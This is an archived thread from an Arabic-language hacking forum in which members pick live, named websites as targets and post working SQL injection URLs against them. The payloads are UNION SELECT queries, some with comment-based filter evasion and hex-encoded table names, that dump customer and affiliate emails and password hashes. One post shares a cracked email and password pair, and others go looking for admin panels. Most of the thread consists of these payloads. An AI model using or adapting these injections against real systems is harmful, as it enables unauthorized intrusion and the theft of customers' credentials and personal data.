:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

VIURIS.SA 12-16-2010 01:03 PM

[align=center]ألسلام عليكم شباب جميعا

أنا جديد بالحقن

وصلت هنا
وأتوقع انه الجدول الصحيح

كود PHP:

http://www.rjtech.net/product_detail.php?id=-61%20union%20select%201,2,group_concat%28table_name,0x3e,column_name,0x3e,table_schema%29,4,5,6,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name%20=%200x75736572-- 

الأعمده
user>User>mysql,
user>Password>mysql,
user>Select_priv>mysql,
user>Insert_priv>mysql,
user>Update_priv>mysql,
user>Delete_priv>mysql,
user>Create_priv>mysql,
user>Drop_priv>mysql,
user>Reload_priv>mysql,
user>Shutdown_priv>mysql,
user>Process_priv>mysql,
user>File_priv>mysql,
user>Grant_priv>mysql,
user>References_priv>mysql,
user>Index_ (4)

وضعت الحقنة التالية ولم تعمل
كود PHP:

    http://www.rjtech.net/product_detail.php?id=-61+union+select+1,2,concat%28User,0x3a,Password%29,4,5,6,7,8,9,10,11,12%20from%20user-- 

جربت غيرها من الجداول ولم تعمل
لكن أتوقع ان هذا هو الدجول الصحيح

شكر لكم
[/align]

VIURIS.SA 12-16-2010 01:06 PM

[align=center]اخي فيكتور سبقتني وما شفت ردك قبلي
لكن خيرها بغيرها إن شاء الله

الله يوفق
ك[/align]

Victors 12-16-2010 01:29 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة loffy (المشاركة 268853)
[align=center]اخي فيكتور سبقتني وما شفت ردك قبلي
لكن خيرها بغيرها إن شاء الله

الله يوفق
ك[/align]


يعطيك العافية اخوي

الموقع فية قواعد بيانات كثيره وكذالك جداول بنفس الاسم ومستخدمين وباسووردات

والله اعلم اي جدول فيهم يقدر يدخلنا للوحة التكم


بالتوفيق اخوي وحياك الله بغرفة الحقن :)

Dr.Unkn0wn 12-16-2010 03:40 PM

ما في هدف ؟

sniper-pal 12-16-2010 08:18 PM

هدف جديد

من عيوني

اتفضلووو

سهل وفيه فيز وشوبينج كمان


مبروك ع الجميع

http://www.integralyogaprograms.org/...imonial_id=113

Dr.Unkn0wn 12-16-2010 08:42 PM

الحقنة كاملة
كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113+UNION+SELECT+1,2,3,concat(customers_id,0x3a,customers_password),5,6,7,8+from+customers--

aircrack -ng 12-16-2010 08:53 PM

الجداول

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
جدول اليوزر

كود:


http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+table_name=0x616666696c696174655f616666696c69617465--

الحقنة كاملة

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(affiliate_email_address,0x3a,affiliate_id,0x3a,affiliate_password),4,5,6,7,8+from+affiliate_affiliate--
الهاشات لساتني احاول افكها صعبة شوي

aircrack -ng 12-16-2010 08:59 PM

وهادي الحقنة كاملة لاعضاء المشاركين في الموقع

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(customers_email_address,0x3a,customers_id,0x3a,customers_password),4,5,6,7,8+from+customers--

Victors 12-16-2010 09:33 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 269093)
الجداول

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
جدول اليوزر

كود:


http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+table_name=0x616666696c696174655f616666696c69617465--

الحقنة كاملة

كود:

http://www.integralyogaprograms.org/customer_testimonials.php?testimonial_id=-113 UNION SELECT 1,2,concat(affiliate_email_address,0x3a,affiliate_id,0x3a,affiliate_password),4,5,6,7,8+from+affiliate_affiliate--
الهاشات لساتني احاول افكها صعبة شوي

تم فك التشفير

tom@redbull.nu:0ftest123

جدوا لوحة التحكم ومبروك عليكم :)

aircrack -ng 12-16-2010 09:43 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 269114)
تم فك التشفير

tom@redbull.nu:0ftest123

جدوا لوحة التحكم ومبروك عليكم :)

يعطيك العافية اخي
جاري التنقيب عليها

إسلام العالم 12-17-2010 12:04 AM

يا إخوة ما دخل معي على لوحة التحكم مع إني فكيت كل الباس المشفر؟؟؟؟؟؟

إسلام العالم 12-17-2010 12:29 AM

هل موقع مو راضي يفوت لا على لوحة الأدمن و لا على أي عضو

aircrack -ng 12-17-2010 12:30 AM

[QUOTE=إسلام العالم;269182]يا إخوة ما دخل معي على لوحة التحكم مع إني فكيت كل الباس المشفر؟؟؟؟؟؟[/QUOTE
ابحث عن لوحة تحكم الادمن
واذا مالقيتها خيرها بغيرها
وجاري التنقيب عن اهداف جديدة

darkman.dz 12-17-2010 12:33 AM

السلام عليكم إخواني الأعزاء كيف الأحوال يا ليكيب ؟؟
هل من جديد ؟ هدف جديد .؟؟
كيف حال الأخ صمودة .....victors؟

إسلام العالم 12-17-2010 12:39 AM

طلع معي بعد البحث عن لوحة التحكم هذا الرابط :

https://www.integralyogaprograms.org...action=process

و لما حاولت فوت عبس....و حتى لما إعمل تسجيل دخول بأي إسم للأعضاء مع الباس تبعه بعد فكه لا يدخل؟؟؟؟

aircrack -ng 12-17-2010 12:40 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 269203)
السلام عليكم إخواني الأعزاء كيف الأحوال يا ليكيب ؟؟
هل من جديد ؟ هدف جديد .؟؟
كيف حال الأخ صمودة .....victors؟

هلا مشرفنا الغالي منور الغرفة

جاري البحث عن مواقع

aircrack -ng 12-17-2010 12:45 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 269207)
طلع معي بعد البحث عن لوحة التحكم هذا الرابط :

https://www.integralyogaprograms.org...action=process

و لما حاولت فوت عبس....و حتى لما إعمل تسجيل دخول بأي إسم للأعضاء مع الباس تبعه بعد فكه لا يدخل؟؟؟؟

هادي لوحة عضويات مش لوحة الادمن
لوحة الادمن هي الاساس

darkman.dz 12-17-2010 12:54 AM

الغرفة منورة بيك أخي صمودة

agentsimo 12-17-2010 01:23 AM

السلام عليكم
كيفكم شباب ???

darkman.dz 12-17-2010 01:27 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 269247)
السلام عليكم
كيفكم شباب ???

وعليكم السلام
الحمد لله
و أ،ت أخي . ؟؟

darkman.dz 12-17-2010 01:31 AM

هههههههههههههههههههههههه
موقع شوبينق وجدته على السريع
كود:

http://gbg.homebizlifestyles.com

aircrack -ng 12-17-2010 01:37 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 269255)
هههههههههههههههههههههههه
موقع شوبينق وجدته على السريع
كود:

http://gbg.homebizlifestyles.com

تسلم اخي
لقيت ملف مصاب ههههههههههه جاري متابعة الحقن

agentsimo 12-17-2010 01:37 AM

_darkman_
***********
الحمد لله
منور الغرفة يا مشرفنا الغالي

darkman.dz 12-17-2010 01:55 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 269260)
تسلم اخي
لقيت ملف مصاب ههههههههههه جاري متابعة الحقن

واصل يا بطل

اقتباس:

المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 269261)
_darkman_
***********
الحمد لله
منور الغرفة يا مشرفنا الغالي

النور نورك ونور الأخ صمودة أخي العزيز :)

aircrack -ng 12-17-2010 02:04 AM

يعطيك العافية مشرفنا الغالي
هذا الموقع يلزمله تركيز
بس الحمد لله قربت انتهي منه

darkman.dz 12-17-2010 02:22 AM

هههههههههههههههههههه
أعرفك حبيبي صمودة ...راك نتاع النهار لكبير :)
+ التالي أحلى أكثر و أكثر
المميزات اللي فيه
1- شوبينق
2- 3 قواعد بيانات في موقع واحد
3- الهاشات md5
4- الموقع طازج
5- الجميل فيه أنو الموقع ليس عليه أي حماية أو منع أو فوربدن ............يعني مالك الموقع يمشي فيه بدعوة الخير هههههههههههه
+ جاري البحث عن لوحة التحكم في خاطر خويا صمودة ........sec sec
6 - الموقع ألماني والإيميلات ألمانية أيضا ههههههههههه
أنا أحب الألمان

Victors 12-17-2010 02:28 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 269203)
السلام عليكم إخواني الأعزاء كيف الأحوال يا ليكيب ؟؟
هل من جديد ؟ هدف جديد .؟؟
كيف حال الأخ صمودة .....victors؟


هلا مشرفنا الغالي

احنا تمام دامك متواجد معنا :)

aircrack -ng 12-17-2010 02:46 AM

الجداول فيه جدول واحد
كود:

http://gbg.homebizlifestyles.com/?id=-313928 UNION /*!SELECT*/ 1,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)+limit+0,1--
جدول اليوزر

كود:

http://gbg.homebizlifestyles.com/?id=-313928 UNION /*!SELECT*/ 1,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+where+table_name=0x5553455253--
مشكلة اخر الحقنة بس مازالني معاها وان شاء الله راح اتخطاها

aircrack -ng 12-17-2010 03:52 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 269310)
هههههههههههههههههههه
أعرفك حبيبي صمودة ...راك نتاع النهار لكبير :)
+ التالي أحلى أكثر و أكثر
المميزات اللي فيه
1- شوبينق
2- 3 قواعد بيانات في موقع واحد
3- الهاشات md5
4- الموقع طازج
5- الجميل فيه أنو الموقع ليس عليه أي حماية أو منع أو فوربدن ............يعني مالك الموقع يمشي فيه بدعوة الخير هههههههههههه
+ جاري البحث عن لوحة التحكم في خاطر خويا صمودة ........sec sec
6 - الموقع ألماني والإيميلات ألمانية أيضا ههههههههههه
أنا أحب الألمان

يعطيك الصحا مشرفنا الغالي

وانا مازالني مع الموقع
عندي اكثر من 30 احتمال عم جرب فيها وباذن الله راح اجيب الموقع

aircrack -ng 12-17-2010 04:22 PM

السلام عليكم
وجمعة مباركة

تم حقنو الجداول

كود:

http://gbg.homebizlifestyles.com/?id=-313928 UNION /*!SELECT*/ 1,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 37)
جدول اليوزر

كود:

http://gbg.homebizlifestyles.com/?id=-313928 UNION /*!SELECT*/ 1,/*!concat*/(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+where+table_name=0x4d454d42455253
الحقنة كاملة

كود:


http://gbg.homebizlifestyles.com/?id=-313928 /*!UNION*/ /*!SELECT*/ 1,/*!concat*/(EMAIL,0x3a,GROUPID,0x3a,FIRSTNAME,0x3a,PURCHASEKEY) ,3,4,5+from+MEMBERS

مافيش لوحة ماقدرتش اعرف شو يطلب هالموقع اميل او الباس او شيء اخر
على العموم تم حقنو

darkman.dz 12-17-2010 04:27 PM

hahahahhahahahhahaha
هات ماعندك أخي صمودة
هههههههههههههههههههه

darkman.dz 12-17-2010 04:33 PM

هههههههههه
جميل أخ صمودة
راني قلتلك راك تاع النهار لكبير
ههههههههههههههههههههه

aircrack -ng 12-17-2010 04:37 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 269531)
hahahahhahahahhahaha
هات ماعندك أخي صمودة
هههههههههههههههههههه

ههههههههههه قولي الحقنة صحيحة او فيها شيء غلط

لاني جدول USERS حاولت اتخطاه بكم احتمال ومانفع وكان مانع FROM
شوف لما احط هيك مثلا
كود:

http://gbg.homebizlifestyles.com/?id=-313928 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5+/*/from/*/+USERS
او هيك

كود:

http://gbg.homebizlifestyles.com/?id=-313928 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5+&&from+USERS
او احط ||
او احط /**/
او /*FROM*/

ولما احط CONCAT يجسني خطا حولت اتحطاها ب UNIHIX ومانفعت
قلت خلينا نبحث عن جداول اخرى عمل PA بدل PAS

aircrack -ng 12-17-2010 04:44 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 269535)
هههههههههه
جميل أخ صمودة
راني قلتلك راك تاع النهار لكبير
ههههههههههههههههههههه

تسلم يااحلى مشرف
لبارح هدا الموقع بيتني قاعد ههههههههههههههههههههههه
ليوم على 6 تاع صباح زدت حاولت معاه حتى وليت نتفلسف ههههههههههههههههههههه
10 مواقع كيما هدا يدوني لجوانفيل ههههههههههههههه

darkman.dz 12-17-2010 04:56 PM

ههههههههههههههههههه
ماشفتي والو
هههههههههه
القادم أحلى
قولي تعرف إستغلال ثغرات أخرين
خلي نوعو شوية في النشاط
لازم نديرو room في vbspiders
نتاع الأعضاء النشطين نتحدثو فيه أولاين

darkman.dz 12-17-2010 04:57 PM

درك نتحدث مع sniper gaza

aircrack -ng 12-17-2010 05:04 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 269543)
ههههههههههههههههههه
ماشفتي والو
هههههههههه
القادم أحلى
قولي تعرف إستغلال ثغرات أخرين
خلي نوعو شوية في النشاط
لازم نديرو room في vbspiders
نتاع الأعضاء النشطين نتحدثو فيه أولاين

انا كيما يقولو كلي في السكيول
بصح معليش نحاولو

aircrack -ng 12-17-2010 05:46 PM

الموقع الي بحقنو الاقيه اصدار 4 ههههههههههههههههههههههه
جاري التنقيب على الاصدار 5 هههههههههههه

إسلام العالم 12-17-2010 07:21 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 269536)
ههههههههههه قولي الحقنة صحيحة او فيها شيء غلط

لاني جدول USERS حاولت اتخطاه بكم احتمال ومانفع وكان مانع FROM
شوف لما احط هيك مثلا
كود:

http://gbg.homebizlifestyles.com/?id=-313928 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5+/*/from/*/+USERS
او هيك

كود:

http://gbg.homebizlifestyles.com/?id=-313928 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5+&&from+USERS
او احط ||
او احط /**/
او /*FROM*/

ولما احط CONCAT يجسني خطا حولت اتحطاها ب UNIHIX ومانفعت
قلت خلينا نبحث عن جداول اخرى عمل PA بدل PAS


أخي عبد الصمد ما شاء الله عليك...

أنا تخيطيت جدول USERS بس كمان ما عرفت كيف إدخل على الموقع...

العواميد في هذا الجدول هكذا :
GROUPID>hbonline_gbgSilver>USERS,
PASSWORD>hbonline_gbgSilver>USERS,
FIRSTNAME>hbonline_gbgSilver>USERS,
LASTNAME>hbonline_gbgSilver>USERS,
PHONE>hbonline_gbgSilver>USERS,
GBGID>hbonline_gbgSilver>USERS,
EMAIL>hbonline_gbgSilver>USERS,
PURCHASEKEY>hbonline_gbgSilver>USERS,
VIDEO>hbonline_gbgSilver>USERS,

RECURRING_ORDER_NUMBER>hbonline_gbgSilver>US

و قدرت إتخطاه مثلا :

اقتباس:

group_CONCAT(GROUPID,0x3e,PASSWORD,0x3e,GBGID)
1001>gbg>313928,1002>richard>312094
smilies16

agentsimo 12-17-2010 07:43 PM

هدف جديد للشبوب
لكنه بلايند سكيوووول
http://www.jofama.se/motorcycle_wear...cts.php?lang=2
بانتضار الحفنة الاخيرة


الساعة الآن 03:47 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0